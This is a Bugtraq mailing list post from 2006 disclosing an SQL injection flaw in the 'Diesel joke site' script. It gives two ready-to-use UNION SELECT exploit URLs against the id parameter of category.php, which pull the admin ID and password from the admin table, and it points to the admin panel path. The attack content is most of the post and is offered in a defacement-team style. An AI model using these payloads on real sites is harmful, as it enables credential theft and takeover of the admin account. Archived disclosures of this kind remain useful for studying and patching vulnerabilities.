Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Sql injection in Diesel joke site script

From: "black code" <black-cod3 () hotmail com>
Date: Sat, 01 Jul 2006 17:52:09 +0300
Sql injection in Diesel joke site

forum type : Diesel joke site
bug found by : black-code
team : site-down
type : Sql injection

####################################################
Sql injection in Diesel joke site

page : category.php

variable : id

####################################################
Exploits :

admin id:
http://www.example.com/path to joke script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/* 

pass:
http://www.example.com/path to joke script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%20admin/* 

aid= admin id
apass= pass of the admin
####################################################

path to admin panel :

http://www.example.com/path to jokes/admin

#######################
emails:

black-cod3 () hotmail com  &  gamr-14 () hotmail com
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Previous By Date Next
Previous By Thread Next

Current thread: